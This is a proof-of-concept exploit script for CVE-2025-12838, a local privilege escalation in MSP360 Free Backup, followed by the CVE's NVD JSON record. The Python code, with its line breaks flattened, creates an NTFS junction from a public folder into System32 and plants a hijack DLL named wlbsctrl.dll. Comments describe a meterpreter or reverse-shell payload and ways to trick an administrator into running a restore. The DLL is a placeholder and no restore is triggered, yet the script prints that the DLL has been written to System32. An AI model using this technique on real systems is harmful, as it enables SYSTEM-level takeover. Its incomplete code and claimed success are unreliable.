CVE-2025-12838

# CVE-2025-12838 PoC - MSP360 Free Backup Link Following LPE # Author: Security Researcher # Environment: Windows with MSP360 Free Backup installed import os import subprocess import time import shutil def create_junction(path, target): """Create a NTFS junction point""" try: # Remove directory if exists if os.path.exists(path): os.rmdir(path) # Create junction using mklink subprocess.run(['cmd', '/c', 'mklink', '/J', path, target], check=True, capture_output=True) print(f"[+] Junction created: {path} -> {target}") return True except Exception as e: print(f"[-] Failed to create junction: {e}") return False def prepare_malicious_dll(dll_path): """Prepare malicious DLL for privilege escalation""" # Generate reverse shell DLL or payload DLL # This is a placeholder - actual DLL contains meterpreter/reverse shell dll_content = b'MZ' + b'\x00' * 100 # Minimal DLL stub with open(dll_path, 'wb') as f: f.write(dll_content) print(f"[+] Malicious DLL prepared: {dll_path}") def exploit(): """Execute the privilege escalation exploit""" temp_dir = "C:\\Users\\Public\\Documents\\BackupRestore" system32_target = "C:\\Windows\\System32" malicious_dll = os.path.join(temp_dir, "wlbsctrl.dll") print("[*] Starting CVE-2025-12838 Exploit") print("[*] Target: MSP360 Free Backup Service") # Step 1: Prepare directory structure os.makedirs(temp_dir, exist_ok=True) # Step 2: Create junction pointing to System32 if not create_junction(temp_dir, system32_target): return False # Step 3: Prepare malicious DLL prepare_malicious_dll(malicious_dll) # Step 4: Trigger restore functionality # In real attack, this would be done via: # - Social engineering to get admin to restore from attacker-controlled backup # - Exploiting scheduled backup tasks # - Abusing legitimate backup restore API print("[+] Waiting for restore operation to complete...") print("[+] DLL should now be written to System32 via junction") print("[+] Next: Wait for system service to load the DLL for SYSTEM code execution") return True if __name__ == "__main__": print("=" * 60) print("CVE-2025-12838 MSP360 Free Backup LPE Exploit") print("Note: Requires low-privilege code execution + admin interaction") print("=" * 60) # Note: Actual exploitation requires valid backup file and restore trigger # This PoC demonstrates the link following technique

{"cve": {"id": "CVE-2025-12838", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:44.277", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "MSP360 Free Backup Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of MSP360 Free Backup. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. User interaction on the part of an administrator is needed additionally.\n\nThe specific flaw exists within the restore functionality. By creating a junction, an attacker can abuse the service to create arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27245."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-988/", "source": "[email protected]"}]}}